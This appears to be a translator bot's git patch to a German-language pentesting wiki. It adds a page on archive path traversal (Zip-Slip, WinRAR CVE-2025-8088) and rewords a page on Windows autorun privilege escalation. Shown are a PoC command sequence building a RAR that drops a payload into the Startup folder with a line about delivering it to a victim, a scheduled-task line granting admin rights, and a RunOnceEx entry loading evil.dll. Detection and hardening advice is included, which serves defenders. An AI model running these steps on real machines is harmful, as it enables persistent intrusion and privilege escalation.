From acc8b9d48c8a36f78889663476da037fe4267944 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Wed, 13 Aug 2025 22:16:19 +0000
Subject: [PATCH] Translated
 ['src/generic-hacking/archive-extraction-path-traversal.md',

---
 src/SUMMARY.md                                |  1 +
 .../archive-extraction-path-traversal.md      | 68 +++++++++++++++++++
 ...vilege-escalation-with-autorun-binaries.md | 54 +++++++++------
 3 files changed, 101 insertions(+), 22 deletions(-)
 create mode 100644 src/generic-hacking/archive-extraction-path-traversal.md

diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index 68cf84961..bb1d3f659 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -79,6 +79,7 @@
 
 # 🧙‍♂️ Generic Hacking
 
+- [Archive Extraction Path Traversal](generic-hacking/archive-extraction-path-traversal.md)
 - [Brute Force - CheatSheet](generic-hacking/brute-force.md)
 - [Esim Javacard Exploitation](generic-hacking/esim-javacard-exploitation.md)
 - [Exfiltration](generic-hacking/exfiltration.md)
diff --git a/src/generic-hacking/archive-extraction-path-traversal.md b/src/generic-hacking/archive-extraction-path-traversal.md
new file mode 100644
index 000000000..ee1c2c9b7
--- /dev/null
+++ b/src/generic-hacking/archive-extraction-path-traversal.md
@@ -0,0 +1,68 @@
+# Archivextraktions-Pfadüberquerung ("Zip-Slip" / WinRAR CVE-2025-8088)
+
+{{#include ../banners/hacktricks-training.md}}
+
+## Übersicht
+
+Viele Archivformate (ZIP, RAR, TAR, 7-ZIP usw.) erlauben es jedem Eintrag, seinen eigenen **internen Pfad** zu tragen. Wenn ein Extraktionswerkzeug diesen Pfad blind akzeptiert, wird ein gestalteter Dateiname, der `..` oder einen **absoluten Pfad** (z. B. `C:\Windows\System32\`) enthält, außerhalb des vom Benutzer gewählten Verzeichnisses geschrieben. Diese Art von Schwachstelle ist weithin bekannt als *Zip-Slip* oder **Archivextraktions-Pfadüberquerung**.
+
+Die Folgen reichen von der Überschreibung beliebiger Dateien bis hin zur direkten Erreichung von **Remote Code Execution (RCE)**, indem ein Payload an einem **Auto-Run**-Standort wie dem Windows *Startup*-Ordner abgelegt wird.
+
+## Grundursache
+
+1. Angreifer erstellt ein Archiv, in dem einer oder mehrere Dateiköpfe enthalten sind:
+* Relative Traversalsequenzen (`..\..\..\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe`)
+* Absolute Pfade (`C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\payload.exe`)
+2. Opfer extrahiert das Archiv mit einem verwundbaren Tool, das dem eingebetteten Pfad vertraut, anstatt ihn zu bereinigen oder die Extraktion unter dem gewählten Verzeichnis zu erzwingen.
+3. Die Datei wird im vom Angreifer kontrollierten Standort geschrieben und beim nächsten Triggern dieses Pfades durch das System oder den Benutzer ausgeführt/geladen.
+
+## Beispiel aus der Praxis – WinRAR ≤ 7.12 (CVE-2025-8088)
+
+WinRAR für Windows (einschließlich der `rar` / `unrar` CLI, der DLL und des tragbaren Quellcodes) konnte Dateinamen während der Extraktion nicht validieren. Ein bösartiges RAR-Archiv, das einen Eintrag wie enthält:
+```text
+..\..\..\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
+```
+würde **außerhalb** des ausgewählten Ausgabeverzeichnisses und im *Startup*-Ordner des Benutzers landen. Nach dem Anmelden führt Windows automatisch alles aus, was dort vorhanden ist, was *persistente* RCE ermöglicht.
+
+### Erstellen eines PoC-Archivs (Linux/Mac)
+```bash
+# Requires rar >= 6.x
+mkdir -p "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
+cp payload.exe "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"
+rar a -ep evil.rar evil/*
+```
+Options verwendet:
+* `-ep`  – Dateipfade genau so speichern, wie sie angegeben sind (nicht führendes `./` entfernen).
+
+Liefern Sie `evil.rar` an das Opfer und weisen Sie es an, es mit einer verwundbaren WinRAR-Version zu extrahieren.
+
+### Beobachtete Ausnutzung in der Wildnis
+
+ESET berichtete über RomCom (Storm-0978/UNC2596) Spear-Phishing-Kampagnen, die RAR-Archive anfügten, die CVE-2025-8088 ausnutzten, um angepasste Hintertüren zu installieren und Ransomware-Operationen zu erleichtern.
+
+## Erkennungstipps
+
+* **Statische Inspektion** – Listen Sie Archiv-Einträge auf und kennzeichnen Sie jeden Namen, der `../`, `..\\`, *absolute Pfade* (`C:`) oder nicht-kanonische UTF-8/UTF-16-Codierungen enthält.
+* **Sandbox-Extraktion** – Dekomprimieren Sie in ein temporäres Verzeichnis mit einem *sicheren* Extraktor (z. B. Pythons `patool`, 7-Zip ≥ neueste Version, `bsdtar`) und überprüfen Sie, ob die resultierenden Pfade im Verzeichnis bleiben.
+* **Endpoint-Überwachung** – Alarmieren Sie bei neuen ausführbaren Dateien, die kurz nach dem Öffnen eines Archivs durch WinRAR/7-Zip/etc. in `Startup`/`Run`-Verzeichnisse geschrieben werden.
+
+## Minderung & Härtung
+
+1. **Aktualisieren Sie den Extraktor** – WinRAR 7.13 implementiert eine ordnungsgemäße Pfadsanierung. Benutzer müssen es manuell herunterladen, da WinRAR über keinen Auto-Update-Mechanismus verfügt.
+2. Extrahieren Sie Archive mit der **„Pfad ignorieren“**-Option (WinRAR: *Extrahieren → "Keine Pfade extrahieren"*) wann immer möglich.
+3. Öffnen Sie nicht vertrauenswürdige Archive **in einer Sandbox** oder VM.
+4. Implementieren Sie Anwendungs-Whitelisting und beschränken Sie den Schreibzugriff der Benutzer auf Auto-Run-Verzeichnisse.
+
+## Zusätzliche betroffene / historische Fälle
+
+* 2018 – Massive *Zip-Slip*-Warnung von Snyk, die viele Java/Go/JS-Bibliotheken betrifft.
+* 2023 – 7-Zip CVE-2023-4011 ähnliche Traversierung während des `-ao`-Mergers.
+* Jede benutzerdefinierte Extraktionslogik, die es versäumt, `PathCanonicalize` / `realpath` vor dem Schreiben aufzurufen.
+
+## Referenzen
+
+- [BleepingComputer – WinRAR Zero-Day ausgenutzt, um Malware bei der Archivextraktion zu platzieren](https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-phishing-attacks/)
+- [WinRAR 7.13 Änderungsprotokoll](https://www.win-rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=283&cHash=a64b4a8f662d3639dec8d65f47bc93c5)
+- [Snyk – Zip Slip-Sicherheitsanfälligkeit](https://snyk.io/research/zip-slip-vulnerability)
+
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index bdd585b25..e140b6945 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -1,10 +1,12 @@
-# Privilegieneskalation mit Autoruns
+# Privilegienerhöhung mit Autoruns
 
 {{#include ../../banners/hacktricks-training.md}}
 
+
+
 ## WMIC
 
-**Wmic** kann verwendet werden, um Programme beim **Start** auszuführen. Sehen Sie, welche Binaries für den Start programmiert sind mit:
+**Wmic** kann verwendet werden, um Programme beim **Start** auszuführen. Sehen Sie, welche Binaries so programmiert sind, dass sie beim Start ausgeführt werden:
 ```bash
 wmic startup get caption,command 2>nul & ^
 Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
@@ -24,7 +26,7 @@ schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgro
 ```
 ## Ordner
 
-Alle Binaries, die sich in den **Startup-Ordnern befinden, werden beim Start ausgeführt**. Die gängigen Startup-Ordner sind die im Folgenden aufgeführten, aber der Startup-Ordner ist in der Registrierung angegeben. [Read this to learn where.](privilege-escalation-with-autorun-binaries.md#startup-path)
+Alle Binaries, die sich in den **Startup-Ordnern befinden, werden beim Start ausgeführt**. Die gängigen Startup-Ordner sind die, die im Folgenden aufgeführt sind, aber der Startup-Ordner ist im Registrierungseditor angegeben. [Read this to learn where.](privilege-escalation-with-autorun-binaries.md#startup-path)
 ```bash
 dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
 dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
@@ -33,9 +35,17 @@ dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
 Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
 Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 ```
+> **FYI**: Archive extraction *path traversal* vulnerabilities (wie die, die in WinRAR vor Version 7.13 – CVE-2025-8088 – ausgenutzt wurden) können verwendet werden, um **Payloads direkt in diese Startup-Ordner während der Dekompression abzulegen**, was zu einer Codeausführung beim nächsten Benutzer-Login führt. Für eine tiefere Analyse dieser Technik siehe:
+
+{{#ref}}
+../../generic-hacking/archive-extraction-path-traversal.md
+{{#endref}}
+
+
+
 ## Registrierung
 
-> [!NOTE]
+> [!TIP]
 > [Hinweis von hier](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): Der **Wow6432Node** Registrierungseintrag zeigt an, dass Sie eine 64-Bit Windows-Version ausführen. Das Betriebssystem verwendet diesen Schlüssel, um eine separate Ansicht von HKEY_LOCAL_MACHINE\SOFTWARE für 32-Bit-Anwendungen anzuzeigen, die auf 64-Bit Windows-Versionen ausgeführt werden.
 
 ### Ausführungen
@@ -56,7 +66,7 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 
 Registrierungsschlüssel, die als **Run** und **RunOnce** bekannt sind, sind dafür ausgelegt, Programme automatisch auszuführen, jedes Mal wenn ein Benutzer sich im System anmeldet. Die Befehlszeile, die als Datenwert eines Schlüssels zugewiesen ist, ist auf 260 Zeichen oder weniger beschränkt.
 
-**Service-Ausführungen** (kann den automatischen Start von Diensten während des Bootvorgangs steuern):
+**Service-Ausführungen** (können den automatischen Start von Diensten während des Bootvorgangs steuern):
 
 - `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
 - `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
@@ -72,15 +82,15 @@ Registrierungsschlüssel, die als **Run** und **RunOnce** bekannt sind, sind daf
 - `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`
 - `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx`
 
-In Windows Vista und späteren Versionen werden die **Run** und **RunOnce** Registrierungsschlüssel nicht automatisch generiert. Einträge in diesen Schlüsseln können entweder Programme direkt starten oder sie als Abhängigkeiten angeben. Zum Beispiel, um eine DLL-Datei beim Anmelden zu laden, könnte man den **RunOnceEx** Registrierungsschlüssel zusammen mit einem "Depend"-Schlüssel verwenden. Dies wird demonstriert, indem ein Registrierungseintrag hinzugefügt wird, um "C:\temp\evil.dll" während des Systemstarts auszuführen:
+In Windows Vista und späteren Versionen werden die **Run** und **RunOnce** Registrierungsschlüssel nicht automatisch generiert. Einträge in diesen Schlüsseln können entweder Programme direkt starten oder sie als Abhängigkeiten angeben. Zum Beispiel, um eine DLL-Datei beim Login zu laden, könnte man den **RunOnceEx** Registrierungsschlüssel zusammen mit einem "Depend"-Schlüssel verwenden. Dies wird demonstriert, indem ein Registrierungseintrag hinzugefügt wird, um "C:\temp\evil.dll" während des Systemstarts auszuführen:
 ```
 reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
 ```
-> [!NOTE]
-> **Exploit 1**: Wenn Sie in einen der genannten Registrierungswerte innerhalb von **HKLM** schreiben können, können Sie die Berechtigungen erhöhen, wenn sich ein anderer Benutzer anmeldet.
+> [!TIP]
+> **Exploit 1**: Wenn Sie in einen der genannten Registrierungszweige innerhalb von **HKLM** schreiben können, können Sie die Berechtigungen erhöhen, wenn sich ein anderer Benutzer anmeldet.
 
-> [!NOTE]
-> **Exploit 2**: Wenn Sie eine der angegebenen Binärdateien in einem der Registrierungswerte innerhalb von **HKLM** überschreiben können, können Sie diese Binärdatei mit einem Hintertür versehen, wenn sich ein anderer Benutzer anmeldet, und die Berechtigungen erhöhen.
+> [!TIP]
+> **Exploit 2**: Wenn Sie eine der angegebenen Binärdateien in einem der Registrierungszweige innerhalb von **HKLM** überschreiben können, können Sie diese Binärdatei mit einem Backdoor modifizieren, wenn sich ein anderer Benutzer anmeldet, und die Berechtigungen erhöhen.
 ```bash
 #CMD
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
@@ -145,8 +155,8 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\Ru
 
 Verknüpfungen, die im **Startup**-Ordner platziert werden, lösen automatisch das Starten von Diensten oder Anwendungen während der Benutzeranmeldung oder des Systemneustarts aus. Der Speicherort des **Startup**-Ordners ist in der Registrierung sowohl für den **Local Machine**- als auch für den **Current User**-Bereich definiert. Das bedeutet, dass jede Verknüpfung, die an diesen angegebenen **Startup**-Standorten hinzugefügt wird, sicherstellt, dass der verlinkte Dienst oder das Programm nach dem Anmelde- oder Neustartprozess gestartet wird, was es zu einer einfachen Methode macht, Programme automatisch auszuführen.
 
-> [!NOTE]
-> Wenn Sie einen beliebigen \[User] Shell Folder unter **HKLM** überschreiben können, können Sie ihn auf einen von Ihnen kontrollierten Ordner verweisen und ein Backdoor platzieren, das jedes Mal ausgeführt wird, wenn ein Benutzer sich im System anmeldet, wodurch die Berechtigungen erhöht werden.
+> [!TIP]
+> Wenn Sie einen beliebigen \[User] Shell Folder unter **HKLM** überschreiben können, können Sie ihn auf einen von Ihnen kontrollierten Ordner verweisen und ein Backdoor platzieren, das jedes Mal ausgeführt wird, wenn ein Benutzer sich im System anmeldet, wodurch Privilegien erhöht werden.
 ```bash
 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
@@ -169,7 +179,7 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
 ```
-> [!NOTE]
+> [!TIP]
 > Wenn Sie den Registrierungswert oder die Binärdatei überschreiben können, werden Sie in der Lage sein, die Berechtigungen zu erhöhen.
 
 ### Richtlinieneinstellungen
@@ -199,7 +209,7 @@ Schritte zum Erstellen einer Boot-Option für den automatischen Start im "Abgesi
 5. Wenden Sie die ursprünglichen Dateiattribute erneut an: `attrib c:\boot.ini +r +s +h`
 
 - **Exploit 1:** Das Ändern des **AlternateShell**-Registrierungsschlüssels ermöglicht die Einrichtung einer benutzerdefinierten Befehlszeile, möglicherweise für unbefugten Zugriff.
-- **Exploit 2 (PATH Schreibberechtigungen):** Schreibberechtigungen für einen Teil der System-**PATH**-Variablen, insbesondere vor `C:\Windows\system32`, ermöglichen es Ihnen, ein benutzerdefiniertes `cmd.exe` auszuführen, das ein Hintertür sein könnte, wenn das System im abgesicherten Modus gestartet wird.
+- **Exploit 2 (PATH Schreibberechtigungen):** Schreibberechtigungen für einen Teil der System-**PATH**-Variablen, insbesondere vor `C:\Windows\system32`, ermöglichen es Ihnen, eine benutzerdefinierte `cmd.exe` auszuführen, die ein Hintertür sein könnte, wenn das System im abgesicherten Modus gestartet wird.
 - **Exploit 3 (PATH und boot.ini Schreibberechtigungen):** Schreibzugriff auf `boot.ini` ermöglicht den automatischen Start im abgesicherten Modus und erleichtert den unbefugten Zugriff beim nächsten Neustart.
 
 Um die aktuelle **AlternateShell**-Einstellung zu überprüfen, verwenden Sie diese Befehle:
@@ -209,16 +219,16 @@ Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Co
 ```
 ### Installierte Komponente
 
-Active Setup ist eine Funktion in Windows, die **vor dem vollständigen Laden der Desktopumgebung initiiert** wird. Sie priorisiert die Ausführung bestimmter Befehle, die abgeschlossen sein müssen, bevor die Benutzeranmeldung fortgesetzt wird. Dieser Prozess erfolgt sogar vor anderen Starteinträgen, wie denen in den Registry-Bereichen Run oder RunOnce.
+Active Setup ist eine Funktion in Windows, die **vor dem vollständigen Laden der Desktop-Umgebung initiiert wird**. Sie priorisiert die Ausführung bestimmter Befehle, die abgeschlossen sein müssen, bevor die Benutzeranmeldung fortgesetzt wird. Dieser Prozess erfolgt sogar noch bevor andere Starteinträge, wie die in den Registry-Bereichen Run oder RunOnce, ausgelöst werden.
 
-Active Setup wird über die folgenden Registrierungsschlüssel verwaltet:
+Active Setup wird über die folgenden Registrierungs-Schlüssel verwaltet:
 
 - `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components`
 - `HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
 - `HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components`
 - `HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
 
-Innerhalb dieser Schlüssel existieren verschiedene Unterschlüssel, die jeweils einem bestimmten Bestandteil entsprechen. Wichtige Schlüsselwerte sind:
+Innerhalb dieser Schlüssel existieren verschiedene Unterkeys, die jeweils einem bestimmten Bestandteil entsprechen. Wichtige Schlüsselwerte sind:
 
 - **IsInstalled:**
 - `0` zeigt an, dass der Befehl des Bestandteils nicht ausgeführt wird.
@@ -227,8 +237,8 @@ Innerhalb dieser Schlüssel existieren verschiedene Unterschlüssel, die jeweils
 
 **Sicherheitsinformationen:**
 
-- Das Ändern oder Schreiben in einen Schlüssel, bei dem **`IsInstalled`** auf `"1"` gesetzt ist, mit einem bestimmten **`StubPath`** kann zu unbefugter Befehlsausführung führen, möglicherweise zur Erhöhung von Rechten.
-- Das Ändern der Binärdatei, die in einem **`StubPath`**-Wert referenziert wird, könnte ebenfalls zur Erhöhung von Rechten führen, sofern ausreichende Berechtigungen vorhanden sind.
+- Das Ändern oder Schreiben in einen Schlüssel, bei dem **`IsInstalled`** auf `"1"` gesetzt ist, mit einem bestimmten **`StubPath`** kann zu unbefugter Befehlsausführung führen, möglicherweise zur Erhöhung der Berechtigungen.
+- Das Ändern der Binärdatei, die in einem **`StubPath`**-Wert referenziert wird, könnte ebenfalls zur Erhöhung der Berechtigungen führen, sofern ausreichende Berechtigungen vorhanden sind.
 
 Um die **`StubPath`**-Konfigurationen über Active Setup-Komponenten zu überprüfen, können diese Befehle verwendet werden:
 ```bash
@@ -252,7 +262,7 @@ Um BHOs, die auf einem System registriert sind, zu erkunden, können Sie die fol
 
 Jeder BHO wird durch seine **CLSID** in der Registrierung dargestellt, die als eindeutiger Identifikator dient. Detaillierte Informationen zu jeder CLSID finden Sie unter `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`.
 
-Für die Abfrage von BHOs in der Registrierung können diese Befehle verwendet werden:
+Um BHOs in der Registrierung abzufragen, können diese Befehle verwendet werden:
 ```bash
 reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
 reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
@@ -264,7 +274,7 @@ reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\B
 
 Beachten Sie, dass die Registrierung für jede DLL einen neuen Registrierungseintrag enthalten wird, der durch die **CLSID** dargestellt wird. Sie können die CLSID-Informationen in `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}` finden.
 
-### Schriftarttreiber
+### Schriftarten-Treiber
 
 - `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers`
 - `HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers`
@@ -291,7 +301,7 @@ HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Executi
 ```
 ## SysInternals
 
-Beachten Sie, dass alle Sites, auf denen Sie Autoruns finden können, **bereits von** [**winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) durchsucht wurden. Für eine **umfassendere Liste von automatisch ausgeführten** Dateien können Sie [autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns) von Sysinternals verwenden:
+Beachten Sie, dass alle Seiten, auf denen Sie Autoruns finden können, **bereits von** [**winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) durchsucht wurden. Für eine **umfassendere Liste von automatisch ausgeführten** Dateien können Sie [autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns) von Sysinternals verwenden:
 ```
 autorunsc.exe -m -nobanner -a * -ct /accepteula
 ```